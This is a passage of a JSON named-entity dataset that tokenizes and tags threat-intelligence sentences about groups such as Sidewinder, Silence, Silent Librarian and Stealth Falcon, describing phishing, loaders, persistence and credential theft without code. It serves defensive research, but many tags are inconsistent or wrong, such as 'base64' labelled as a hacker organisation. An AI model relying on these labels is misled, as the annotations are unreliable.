"Sidewinder", - "has", - "used", - "the", - "ActiveXObject", - "utility", - "to", - "create", - "OLE", - "objects", - "to", - "obtain", - "execution", - "through", - "Internet", - "Explorer." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sidewinder", - "has", - "used", - "base64", - "encoding", - "and", - "ECDH-P256", - "encryption", - "for", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-HackOrg", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sidewinder", - "has", - "exploited", - "vulnerabilities", - "to", - "gain", - "execution", - "including", - "CVE-2017-11882", - "and", - "CVE-2020-0674." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "Sidewinder", - "has", - "used", - "malware", - "to", - "collect", - "information", - "on", - "files", - "and", - "directories." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sidewinder", - "has", - "used", - "LNK", - "files", - "to", - "download", - "remote", - "files", - "to", - "the", - "victim's", - "network." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sidewinder", - "has", - "used", - "JavaScript", - "to", - "drop", - "and", - "execute", - "malware", - "loaders." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sidewinder", - "has", - "collected", - "stolen", - "files", - "in", - "a", - "temporary", - "folder", - "in", - "preparation", - "for", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sidewinder", - "has", - "lured", - "targets", - "to", - "click", - "on", - "malicious", - "files", - "to", - "gain", - "execution", - "in", - "the", - "target", - "environment." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sidewinder", - "has", - "lured", - "targets", - "to", - "click", - "on", - "malicious", - "links", - "to", - "gain", - "execution", - "in", - "the", - "target", - "environment." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sidewinder", - "has", - "named", - "malicious", - "files", - "<code>rekeywiz.exe</code>", - "to", - "match", - "the", - "name", - "of", - "a", - "legitimate", - "Windows", - "executable." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "I-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sidewinder", - "has", - "used", - "<code>mshta.exe</code>", - "to", - "execute", - "malicious", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sidewinder", - "has", - "used", - "PowerShell", - "to", - "drop", - "and", - "execute", - "malware", - "loaders." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sidewinder", - "has", - "used", - "tools", - "to", - "identify", - "running", - "processes", - "on", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sidewinder", - "has", - "added", - "paths", - "to", - "executables", - "in", - "the", - "Registry", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sidewinder", - "has", - "used", - "the", - "Windows", - "service", - "<code>winmgmts:\\\\.\\root\\SecurityCenter2</code>", - "to", - "check", - "installed", - "antivirus", - "products." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sidewinder", - "has", - "used", - "tools", - "to", - "enumerate", - "software", - "installed", - "on", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sidewinder", - "has", - "sent", - "e-mails", - "with", - "malicious", - "attachments", - "often", - "crafted", - "for", - "specific", - "targets." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sidewinder", - "has", - "sent", - "e-mails", - "with", - "malicious", - "attachments", - "that", - "lead", - "victims", - "to", - "credential", - "harvesting", - "websites." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sidewinder", - "has", - "sent", - "e-mails", - "with", - "malicious", - "links", - "often", - "crafted", - "for", - "specific", - "targets." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sidewinder", - "has", - "sent", - "e-mails", - "with", - "malicious", - "links", - "to", - "credential", - "harvesting", - "websites." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sidewinder", - "has", - "used", - "tools", - "to", - "collect", - "the", - "computer", - "name,", - "OS", - "version,", - "installed", - "hotfixes,", - "as", - "well", - "as", - "information", - "regarding", - "the", - "memory", - "and", - "processor", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sidewinder", - "has", - "used", - "malware", - "to", - "collect", - "information", - "on", - "network", - "interfaces,", - "including", - "the", - "MAC", - "address." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sidewinder", - "has", - "used", - "tools", - "to", - "identify", - "the", - "user", - "of", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sidewinder", - "has", - "used", - "tools", - "to", - "obtain", - "the", - "current", - "system", - "time." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Sidewinder", - "has", - "used", - "VBScript", - "to", - "drop", - "and", - "execute", - "malware", - "loaders." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sidewinder", - "has", - "used", - "HTTP", - "in", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Silence", - "has", - "used", - "a", - "valid", - "certificate", - "to", - "sign", - "their", - "primary", - "loader", - "Silence.Downloader", - "(aka", - "TrueBot)." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Silence", - "has", - "used", - "environment", - "variable", - "string", - "substitution", - "for", - "obfuscation." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Silence", - "has", - "weaponized", - "CHM", - "files", - "in", - "their", - "phishing", - "campaigns." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Silence", - "has", - "used", - "ProxyBot,", - "which", - "allows", - "the", - "attacker", - "to", - "redirect", - "traffic", - "from", - "the", - "current", - "node", - "to", - "the", - "backconnect", - "server", - "via", - "Sock4\\Socks5." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Silence", - "has", - "deleted", - "artifacts,", - "including", - "scheduled", - "tasks,", - "communicates", - "files", - "from", - "the", - "C2", - "and", - "other", - "logs." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Silence", - "has", - "downloaded", - "additional", - "modules", - "and", - "malware", - "to", - "victim’s", - "machines." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Silence", - "has", - "used", - "JS", - "scripts." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Silence", - "has", - "used", - "the", - "Farse6.1", - "utility", - "(based", - "on", - "Mimikatz)", - "to", - "extract", - "credentials", - "from", - "lsass.exe." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "I-Purp", - "I-Purp", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Silence", - "attempts", - "to", - "get", - "users", - "to", - "launch", - "malicious", - "attachments", - "delivered", - "via", - "spearphishing", - "emails." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SecTeam", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Silence", - "has", - "named", - "its", - "backdoor", - "\"WINWORD.exe\"." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Silence", - "can", - "create,", - "delete,", - "or", - "modify", - "a", - "specified", - "Registry", - "key", - "or", - "value." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "B-Features", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Silence", - "has", - "leveraged", - "the", - "Windows", - "API,", - "including", - "using", - "CreateProcess()", - "or", - "ShellExecute(),", - "to", - "perform", - "a", - "variety", - "of", - "tasks." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Silence", - "has", - "used", - "port", - "444", - "when", - "sending", - "data", - "about", - "the", - "system", - "from", - "the", - "client", - "to", - "the", - "server." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Silence", - "has", - "used", - "PowerShell", - "to", - "download", - "and", - "execute", - "payloads." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Silence", - "has", - "injected", - "a", - "DLL", - "library", - "containing", - "a", - "Trojan", - "into", - "the", - "fwmain32.exe", - "process." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Silence", - "has", - "used", - "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>,", - "<code>HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>,", - "and", - "the", - "Startup", - "folder", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O", - "B-Way", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Silence", - "has", - "used", - "RDP", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Silence", - "has", - "used", - "Nmap", - "to", - "scan", - "the", - "corporate", - "network,", - "build", - "a", - "network", - "topology,", - "and", - "identify", - "vulnerable", - "hosts." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Silence", - "has", - "used", - "scheduled", - "tasks", - "to", - "stage", - "its", - "operation." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Silence", - "can", - "capture", - "victim", - "screen", - "activity." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Silence", - "has", - "used", - "Winexe", - "to", - "install", - "a", - "service", - "on", - "the", - "remote", - "system." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Silence", - "has", - "used", - "RAdmin,", - "a", - "remote", - "software", - "tool", - "used", - "to", - "remotely", - "control", - "workstations", - "and", - "ATMs." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Silence", - "has", - "sent", - "emails", - "with", - "malicious", - "DOCX,", - "CHM,", - "LNK", - "and", - "ZIP", - "attachments." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "O", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "Silence", - "has", - "obtained", - "and", - "modified", - "versions", - "of", - "publicly-available", - "tools", - "like", - "Empire", - "and", - "PsExec." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Silence", - "has", - "used", - "compromised", - "credentials", - "to", - "log", - "on", - "to", - "other", - "systems", - "and", - "escalate", - "privileges." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "I-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Silence", - "has", - "been", - "observed", - "making", - "videos", - "of", - "victims", - "to", - "observe", - "bank", - "employees", - "day", - "to", - "day", - "activities." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Org", - "I-Org", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Silence", - "has", - "used", - "VBS", - "scripts." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Silence", - "has", - "used", - "Windows", - "command-line", - "to", - "run", - "commands." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Silent", - "Librarian", - "has", - "obtained", - "free", - "Let's", - "Encrypt", - "SSL", - "certificates", - "for", - "use", - "on", - "their", - "phishing", - "pages." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Silent", - "Librarian", - "has", - "acquired", - "domains", - "to", - "establish", - "credential", - "harvesting", - "pages,", - "often", - "spoofing", - "the", - "target", - "organization", - "and", - "using", - "free", - "top", - "level", - "domains", - ".TK,", - ".ML,", - ".GA,", - ".CF,", - "and", - ".GQ." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Silent", - "Librarian", - "has", - "established", - "e-mail", - "accounts", - "to", - "receive", - "e-mails", - "forwarded", - "from", - "compromised", - "accounts." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Silent", - "Librarian", - "has", - "collected", - "e-mail", - "addresses", - "from", - "targeted", - "organizations", - "from", - "open", - "Internet", - "searches." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Silent", - "Librarian", - "has", - "exfiltrated", - "entire", - "mailboxes", - "from", - "compromised", - "accounts." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Silent", - "Librarian", - "has", - "set", - "up", - "auto", - "forwarding", - "rules", - "on", - "compromised", - "e-mail", - "accounts." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Silent", - "Librarian", - "has", - "collected", - "lists", - "of", - "names", - "for", - "individuals", - "from", - "targeted", - "organizations." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Silent", - "Librarian", - "has", - "cloned", - "victim", - "organization", - "login", - "pages", - "and", - "staged", - "them", - "for", - "later", - "use", - "in", - "credential", - "harvesting", - "campaigns.", - "Silent", - "Librarian", - "has", - "also", - "made", - "use", - "of", - "a", - "variety", - "of", - "URL", - "shorteners", - "for", - "these", - "staged", - "websites." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "I-OffAct", - "O", - "I-HackOrg", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Silent", - "Librarian", - "has", - "used", - "collected", - "lists", - "of", - "names", - "and", - "e-mail", - "accounts", - "to", - "use", - "in", - "password", - "spraying", - "attacks", - "against", - "private", - "sector", - "targets." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "I-OffAct", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Silent", - "Librarian", - "has", - "searched", - "victim's", - "websites", - "to", - "identify", - "the", - "interests", - "and", - "academic", - "areas", - "of", - "targeted", - "individuals", - "and", - "to", - "scrape", - "source", - "code,", - "branding,", - "and", - "organizational", - "contact", - "information", - "for", - "phishing", - "pages." - ], - "ner_tags": [ - "I-SecTeam", - "I-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Silent", - "Librarian", - "has", - "used", - "links", - "in", - "e-mails", - "to", - "direct", - "victims", - "to", - "credential", - "harvesting", - "websites", - "designed", - "to", - "appear", - "like", - "the", - "targeted", - "organization's", - "login", - "page." - ], - "ner_tags": [ - "I-HackOrg", - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Silent", - "Librarian", - "has", - "obtained", - "free", - "and", - "publicly", - "available", - "tools", - "including", - "SingleFile", - "and", - "HTTrack", - "to", - "copy", - "login", - "pages", - "of", - "targeted", - "organizations." - ], - "ner_tags": [ - "I-SecTeam", - "I-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Silent", - "Librarian", - "has", - "used", - "compromised", - "credentials", - "to", - "obtain", - "unauthorized", - "access", - "to", - "online", - "accounts." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "I-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SilverTerrier", - "uses", - "FTP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SilverTerrier", - "targets", - "organizations", - "in", - "high", - "technology,", - "higher", - "education,", - "and", - "manufacturing", - "for", - "business", - "email", - "compromise", - "(BEC)", - "campaigns", - "with", - "the", - "goal", - "of", - "financial", - "theft." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Idus", - "O", - "I-Idus", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct", - "O", - "O", - "O", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "SilverTerrier", - "uses", - "SMTP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SilverTerrier", - "uses", - "HTTP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sowbug", - "extracted", - "documents", - "and", - "bundled", - "them", - "into", - "a", - "RAR", - "archive." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sowbug", - "extracted", - "Word", - "documents", - "from", - "a", - "file", - "server", - "on", - "a", - "victim", - "network." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Tool", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sowbug", - "identified", - "and", - "extracted", - "all", - "Word", - "documents", - "on", - "a", - "server", - "by", - "using", - "a", - "command", - "containing", - "*", - ".doc", - "and", - "*.docx.", - "The", - "actors", - "also", - "searched", - "for", - "documents", - "based", - "on", - "a", - "specific", - "date", - "range", - "and", - "attempted", - "to", - "identify", - "all", - "installed", - "software", - "on", - "a", - "victim." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "I-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sowbug", - "has", - "used", - "keylogging", - "tools." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Sowbug", - "named", - "its", - "tools", - "to", - "masquerade", - "as", - "Windows", - "or", - "Adobe", - "Reader", - "software,", - "such", - "as", - "by", - "using", - "the", - "file", - "name", - "adobecms.exe", - "and", - "the", - "directory", - "<code>CSIDL_APPDATA\\microsoft\\security</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Sowbug", - "listed", - "remote", - "shared", - "drives", - "that", - "were", - "accessible", - "from", - "a", - "victim." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sowbug", - "has", - "used", - "credential", - "dumping", - "tools." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Sowbug", - "obtained", - "OS", - "version", - "and", - "hardware", - "configuration", - "from", - "a", - "victim." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sowbug", - "has", - "used", - "command", - "line", - "during", - "its", - "intrusions." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stealth", - "Falcon", - "malware", - "uses", - "WMI", - "to", - "script", - "data", - "collection", - "and", - "command", - "execution", - "on", - "the", - "victim." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stealth", - "Falcon", - "malware", - "gathers", - "passwords", - "from", - "multiple", - "sources,", - "including", - "Windows", - "Credential", - "Vault", - "and", - "Outlook." - ], - "ner_tags": [ - "B-Way", - "B-HackOrg", - "B-Tool", - "B-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stealth", - "Falcon", - "malware", - "gathers", - "passwords", - "from", - "multiple", - "sources,", - "including", - "Internet", - "Explorer,", - "Firefox,", - "and", - "Chrome." - ], - "ner_tags": [ - "B-Way", - "B-HackOrg", - "O", - "B-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "I-Tool", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Stealth", - "Falcon", - "malware", - "gathers", - "data", - "from", - "the", - "local", - "victim", - "system." - ], - "ner_tags": [ - "B-Way", - "B-HackOrg", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "After", - "data", - "is", - "collected", - "by", - "Stealth", - "Falcon", - "malware,", - "it", - "is", - "exfiltrated", - "over", - "the", - "existing", - "C2", - "channel." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stealth", - "Falcon", - "malware", - "uses", - "PowerShell", - "commands", - "to", - "perform", - "various", - "functions,", - "including", - "gathering", - "system", - "information", - "via", - "WMI", - "and", - "executing", - "commands", - "from", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "B-Tool", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stealth", - "Falcon", - "malware", - "gathers", - "a", - "list", - "of", - "running", - "processes." - ], - "ner_tags": [ - "B-Way", - "I-Tool", - "I-Tool", - "B-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Stealth", - "Falcon", - "malware", - "attempts", - "to", - "determine", - "the", - "installed", - "version", - "of", - ".NET", - "by", - "querying", - "the", - "Registry." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stealth", - "Falcon", - "malware", - "creates", - "a", - "scheduled", - "task", - "entitled", - "“IE", - "Web", - "Cache”", - "to", - "execute", - "a", - "malicious", - "file", - "hourly." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stealth", - "Falcon", - "malware", - "encrypts", - "C2", - "traffic", - "using", - "RC4", - "with", - "a", - "hard-coded", - "key." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stealth", - "Falcon", - "malware", - "gathers", - "system", - "information", - "via", - "WMI,", - "including", - "the", - "system", - "directory,", - "build", - "number,", - 